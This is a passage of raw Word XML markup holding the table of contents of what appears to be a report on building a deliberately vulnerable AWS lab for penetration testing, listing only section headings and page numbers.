              </w:rPr>
              <w:t>3.2 Penetration testing</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12</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17198ABA" w14:textId="163A894A" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521094" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Scope of Penetration Testing</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13</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49EBAE4D" w14:textId="5F8D2ECC" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521095" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4 Penetration Testing Types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14</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="718AAAAB" w14:textId="7E9CB977" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521096" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5 Proof of Concept</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14</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FC25522" w14:textId="2A387C9D" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521097" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6 CVE and CVSS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14</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D48F2AA" w14:textId="36D6353C" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521098" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.7 Exploit and Payload</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17</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42921A3B" w14:textId="6E4C1703" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521099" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.8 Privilege Escalation, Pivoting, OWASP, and Revershell</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_Toc223521099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18</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A05254B" w14:textId="5E52BE94" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521100" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9 Tools in Penetration Testing</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19</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3274A29C" w14:textId="155214E0" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521101" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. ENVIRONMENT CONFIGURATION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20</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F8F17F5" w14:textId="1B72230F" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521102" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.1 Introduction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20</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F96F14F" w14:textId="17C79AB3" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521103" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.2 AWS Configuration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21</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CB465B4" w14:textId="61E29D70"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04" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.1 Architecture Overview</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21</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7FAE638F" w14:textId="40D47778"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05" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.1.1 Architecture Design and Objectives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22</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="602E557D" w14:textId="135F123A"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06" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.1.2 High-Level Architecture Description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22</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C929604" w14:textId="718ECF76"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07" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.1.3 Component Roles and Functions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23</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E921016" w14:textId="0A95F023"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08" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.1.4 Virtual Machine Inventory and Configuration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24</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="548006EA" w14:textId="352A21F7"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09" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.2.2 Networking in AWS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_Toc223521109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25</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E962090" w14:textId="2C65E3DD"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0" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.2.3 Security in AWS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28</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="706C212E" w14:textId="5BE354AC"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1" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.2.4 Configuring the environments of EC2 Instances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32</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F41DEFD" w14:textId="5E396998"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2" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.4.1 Apache Tomcat Manager Configuration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33</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D1484BA" w14:textId="76EEEE90"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3" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.4.2 Hidden Backup File with Encoded Credentials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34</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37348DF1" w14:textId="7355EBEB"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4" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.4.3 File Ownership Misconfiguration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34</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76361D21" w14:textId="762432CE"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5" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.4.4 Sudo Privilege Misconfiguration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34</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15087F3D" w14:textId="45F4CA09"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6" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.4.5 Docker Group Privilege Escalation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35</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02061191" w14:textId="6474039F"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7" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.4.6 Cron Job Privilege Escalation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35</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DDCA950" w14:textId="2EA274E4"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18" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.4.7 ServerMeta Web Application Vulnerabilities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36</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55584066" w14:textId="1F9CB1DD" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2" w:rsidP="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:ind w:left="0"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521119" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5. PENETRATION TESTING: METHODOLOGY AND INSTRUCTIONS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_Toc223521119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38</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35AB6DD6" w14:textId="57C82DAA" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521120" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5.1 Introduction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38</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CA169FC" w14:textId="745E11DE" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521121" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">5.2 Apache Tomcat Chain: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>From Tomcat RCE (Remote Code Execution) to Root</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40</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
